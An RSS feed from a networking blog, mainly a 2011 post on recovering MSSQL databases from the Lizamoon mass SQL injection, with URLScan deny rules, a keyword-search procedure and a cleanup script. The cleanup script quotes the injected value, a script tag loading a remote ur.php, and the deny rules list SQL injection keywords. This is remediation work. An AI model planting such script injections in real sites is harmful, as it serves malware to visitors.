<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>vty.cc</title>
	<atom:link href="http://vty.cc/feed/" rel="self" type="application/rss+xml" />
	<link>http://vty.cc</link>
	<description>networking with shoelaces</description>
	<lastBuildDate>Thu, 31 Mar 2011 19:33:27 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Lizamoon.com knows SEO! Or how to fix an MSSQL injection. (NEW) &#8211;t6ryt56.info/ur.php</title>
		<link>http://vty.cc/2011/03/29/lizamoon-com-knows-seo-or-how-to-fix-an-mssql-injection/</link>
		<comments>http://vty.cc/2011/03/29/lizamoon-com-knows-seo-or-how-to-fix-an-mssql-injection/#comments</comments>
		<pubDate>Wed, 30 Mar 2011 00:58:08 +0000</pubDate>
		<dc:creator>vty</dc:creator>
				<category><![CDATA[SQL]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[lizamoon]]></category>
		<category><![CDATA[MSSQL]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sql]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://vty.cc/?p=63</guid>
		<description><![CDATA[Edit3: Currently testing the following urlscan sql inject blocking rules; I don&#8217;t have time to fix the wordpress syntax issues, so I&#8217;m posting the code on Pastebin also; CODE ALSO HERE http://pastebin.com/y40r6X6J &#60;span style=&#34;font-family: Consolas, Monaco, 'Courier New', Courier, monospace; font-size: 12px; line-height: 18px; white-space: pre;&#34;&#62;RuleList=SQL Injection&#60;/span&#62; &#60;pre&#62;  [SQL Injection] AppliesTo=.asp,.aspx DenyDataSection=SQL Injection Strings ScanUrl=0 ScanAllRaw=0 [...]]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><p>Edit3: Currently testing the following urlscan sql inject blocking rules;</p>
<p>I don&#8217;t have time to fix the wordpress syntax issues, so I&#8217;m posting the code on Pastebin also;</p>
<p>CODE ALSO HERE <a href="http://pastebin.com/y40r6X6J">http://pastebin.com/y40r6X6J</a></p>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">&lt;span style=&quot;font-family: Consolas, Monaco, 'Courier New', Courier, monospace; font-size: 12px; line-height: 18px; white-space: pre;&quot;&gt;RuleList=SQL Injection&lt;/span&gt;<br />
&lt;pre&gt; <br />
[SQL Injection]<br />
AppliesTo=.asp,.aspx<br />
DenyDataSection=SQL Injection Strings<br />
ScanUrl=0<br />
ScanAllRaw=0<br />
ScanQueryString=1<br />
ScanHeaders=SQL Injection Headers<br />
<br />
[SQL Injection Strings]<br />
--<br />
%3b ; a semicolon<br />
/*<br />
@ ; also catches @@<br />
char ; also catches nchar and varchar<br />
alter<br />
begin<br />
cast<br />
convert<br />
cursor<br />
declare<br />
delete<br />
drop<br />
end<br />
exec ; also catches execute<br />
fetch<br />
kill<br />
open<br />
select<br />
sys ; also catches sysobjects and syscolumns<br />
table<br />
<br />
[SQL Injection Headers]<br />
<br />
AppliesTo=.asp,.aspx<br />
DenyDataSection=SQL Injection Headers Strings<br />
ScanUrl=0<br />
ScanAllRaw=0<br />
ScanQueryString=0<br />
ScanHeaders=Cookie:<br />
<br />
[SQL Injection Headers Strings]<br />
--<br />
@ ; also catches @@<br />
alter<br />
cast<br />
convert<br />
declare<br />
delete<br />
drop<br />
exec ; also catches execute<br />
fetch<br />
insert<br />
kill<br />
select&lt;/pre&gt;</div></div>
<p>Edit2: I am now seeing injections using hxxp://t6ryt56.info/ur.php as the URL instead of lizamoon.</p>
<p>Edit: I&#8217;m still working out the WordPress code issues. A lot has been appended that should not be in the below code, &lt;span&gt; etc, will fix soon.</p>
<p>Great information located here, Websense appears to be keeping pretty up to date on it;</p>
<p><a href="http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx">http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx</a></p>
<p>#</p>
<p>I have a feeling that this Lizamoon.com inject will be getting around quite a bit.</p>
<p>Here are the steps I took to resolve post-injection, &#8211; tested on SQL2k5 &#8211; CODE ALSO HERE <a href="http://pastebin.com/M3BmePWC">http://pastebin.com/M3BmePWC</a></p>
<p>1. I wanted an easy way to track down every instance of a keyword in EVERY column and table. I used this stored procedure;</p>
<pre><span style="font-family: Verdana; font-size: x-small;"><span style="color: blue; font-family: verdana; font-size: xx-small;">
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">CREATE PROC FindAll<br />
(<br />
&nbsp; &nbsp; @SearchStr nvarchar(100)<br />
)<br />
AS<br />
BEGIN<br />
&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;<br />
&lt;pre&gt;&lt;span style=&quot;font-family: Verdana; font-size: x-small;&quot;&gt;&lt;span style=&quot;color: blue; font-family: verdana; font-size: xx-small;&quot;&gt; CREATE TABLE #Results (ColumnName nvarchar(370), ColumnValue nvarchar(3630))<br />
<br />
&nbsp; &nbsp; SET NOCOUNT ON<br />
<br />
&nbsp; &nbsp; DECLARE @TableName nvarchar(256), @ColumnName nvarchar(128), @SearchStr2 nvarchar(110)<br />
&nbsp; &nbsp; SET &nbsp;@TableName = ''<br />
&nbsp; &nbsp; SET @SearchStr2 = QUOTENAME('%' + @SearchStr + '%','''')<br />
<br />
&nbsp; &nbsp; WHILE @TableName IS NOT NULL<br />
&nbsp; &nbsp; BEGIN<br />
&nbsp; &nbsp; &nbsp; &nbsp; SET @ColumnName = ''<br />
&nbsp; &nbsp; &nbsp; &nbsp; SET @TableName =<br />
&nbsp; &nbsp; &nbsp; &nbsp; (<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; SELECT MIN(QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; FROM &nbsp; &nbsp;INFORMATION_SCHEMA.TABLES<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WHERE &nbsp; &nbsp; &nbsp; TABLE_TYPE = 'BASE TABLE'<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; AND QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) &gt; @TableName<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; AND OBJECTPROPERTY(<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; OBJECT_ID(<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;), 'IsMSShipped'<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;) = 0<br />
&nbsp; &nbsp; &nbsp; &nbsp; )<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; WHILE (@TableName IS NOT NULL) AND (@ColumnName IS NOT NULL)<br />
&nbsp; &nbsp; &nbsp; &nbsp; BEGIN<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; SET @ColumnName =<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; (<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; SELECT MIN(QUOTENAME(COLUMN_NAME))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; FROM &nbsp; &nbsp;INFORMATION_SCHEMA.COLUMNS<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WHERE &nbsp; &nbsp; &nbsp; TABLE_SCHEMA&nbsp; &nbsp; = PARSENAME(@TableName, 2)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; AND TABLE_NAME&nbsp; = PARSENAME(@TableName, 1)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; AND DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar')<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; AND QUOTENAME(COLUMN_NAME) &gt; @ColumnName<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; )<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; IF @ColumnName IS NOT NULL<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; BEGIN<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; INSERT INTO #Results<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; EXEC<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; (<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'SELECT ''' + @TableName + '.' + @ColumnName + ''', LEFT(' + @ColumnName + ', 3630)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; FROM ' + @TableName + ' (NOLOCK) ' +<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ' WHERE ' + @ColumnName + ' LIKE ' + @SearchStr2<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; )<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; END<br />
&nbsp; &nbsp; &nbsp; &nbsp; END<br />
&nbsp; &nbsp; END<br />
<br />
&nbsp; &nbsp; SELECT ColumnName, ColumnValue FROM #Results<br />
END&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;<br />
&lt;pre&gt;&lt;span style=&quot;font-family: Verdana; font-size: x-small;&quot;&gt;&lt;span style=&quot;color: blue; font-family: verdana; font-size: xx-small;&quot;&gt;</div></div>

</span></span></pre>
<p>This will be executed via the following query;</p>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">EXEC FindAll 'lizamoon'</div></div>
<p>Now that we know what we&#8217;re working against, you&#8217;ll want to find and replace with blank space (this will not affect anything outside of the string). CODE ALSO HERE &#8211; <a href="http://pastebin.com/cJ1SWaKh">http://pastebin.com/cJ1SWaKh</a></p>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">SET NOCOUNT ON</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">&nbsp;</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">DECLARE @stringToFind VARCHAR(100)<br />
DECLARE @stringToReplace VARCHAR(100)<br />
DECLARE @schema sysname<br />
DECLARE @table</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">sysname</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">DECLARE @count INT<br />
DECLARE @sqlCommand VARCHAR(8000)<br />
DECLARE @where VARCHAR(8000)<br />
DECLARE @columnName</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">sysname</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">DECLARE @object_id INT</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">SET @stringToFind = '&amp;lt;/title&amp;gt;&amp;lt;script src=http://lizamoon.com/ur.php&amp;gt;&amp;lt;/script&amp;gt;'<br />
SET @stringToReplace = ''</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">DECLARE TAB_CURSOR CURSOR  FOR<br />
SELECT   B.NAME      AS SCHEMANAME,<br />
A.NAME      AS TABLENAME,<br />
A.OBJECT_ID<br />
FROM     sys.objects A<br />
INNER JOIN sys.schemas B<br />
ON A.SCHEMA_ID = B.SCHEMA_ID<br />
WHERE    TYPE = 'U'<br />
ORDER BY 1</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">OPEN TAB_CURSOR</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">FETCH NEXT FROM TAB_CURSOR<br />
INTO @schema,<br />
@table,<br />
@object_id</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">WHILE @@FETCH_STATUS = 0<br />
BEGIN<br />
DECLARE COL_CURSOR CURSOR FOR<br />
SELECT A.NAME<br />
FROM   sys.columns A<br />
INNER JOIN sys.types B<br />
ON A.SYSTEM_TYPE_ID = B.SYSTEM_TYPE_ID<br />
WHERE  OBJECT_ID = @object_id<br />
AND IS_COMPUTED = 0<br />
AND B.NAME IN ('char','nchar','nvarchar','varchar','text','ntext')</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">OPEN COL_CURSOR</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">&nbsp;</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">FETCH NEXT FROM COL_CURSOR<br />
INTO @columnName</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">WHILE @@FETCH_STATUS = 0<br />
BEGIN<br />
SET @sqlCommand = 'UPDATE ' + @schema + '.' + @table + ' SET [' + @columnName + '] = REPLACE(convert(nvarchar(max),[' + @columnName + ']),''' + @stringToFind + ''',''' + @stringToReplace + ''')'</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">SET @where = ' WHERE [' + @columnName + '] LIKE ''%' + @stringToFind + '%'''</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">EXEC( @sqlCommand + @where)</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">SET @count = @@ROWCOUNT</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">IF @count &amp;gt; 0<br />
BEGIN<br />
PRINT @sqlCommand + @where<br />
PRINT 'Updated: ' + CONVERT(VARCHAR(10),@count)<br />
PRINT '----------------------------------------------------'<br />
END</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">FETCH NEXT FROM COL_CURSOR<br />
INTO @columnName<br />
END</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">CLOSE COL_CURSOR<br />
DEALLOCATE COL_CURSOR</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">FETCH NEXT FROM TAB_CURSOR<br />
INTO @schema,<br />
@table,<br />
@object_id<br />
END</div></div>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">&nbsp;</div></div>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<div class="codecolorer-container text blackboard" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">CLOSE TAB_CURSOR<br />
DEALLOCATE TAB_CURSOR</div></div>
<p>&nbsp;</p>
<!-- Start Shareaholic LikeButtonSetBottom Automatic --><!-- End Shareaholic LikeButtonSetBottom Automatic --><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fvty.cc%2F2011%2F03%2F29%2Flizamoon-com-knows-seo-or-how-to-fix-an-mssql-injection%2F&amp;title=Lizamoon.com%20knows%20SEO%21%20Or%20how%20to%20fix%20an%20MSSQL%20injection.%20%28NEW%29%20%26%238211%3Bt6ryt56.info%2Fur.php" id="wpa2a_2"><img src="http://vty.cc/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://vty.cc/2011/03/29/lizamoon-com-knows-seo-or-how-to-fix-an-mssql-injection/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title></title>
		<link>http://vty.cc/2009/12/30/hello-world/</link>
		<comments>http://vty.cc/2009/12/30/hello-world/#comments</comments>
		<pubDate>Thu, 31 Dec 2009 00:44:05 +0000</pubDate>
		<dc:creator>vty</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://vty.cc/?p=1</guid>
		<description><![CDATA[my ccie/jncie diagrams]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><p>my ccie/jncie diagrams</p>
<p><a href="http://vty.cc/wp-content/uploads/2009/12/iossucks.png"><img class="alignnone size-full wp-image-45" title="ios sux" src="http://vty.cc/wp-content/uploads/2009/12/iossucks.png" alt="" width="830" height="408" /></a></p>
<!-- Start Shareaholic LikeButtonSetBottom Automatic --><!-- End Shareaholic LikeButtonSetBottom Automatic --><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fvty.cc%2F2009%2F12%2F30%2Fhello-world%2F&amp;title=" id="wpa2a_4"><img src="http://vty.cc/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://vty.cc/2009/12/30/hello-world/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

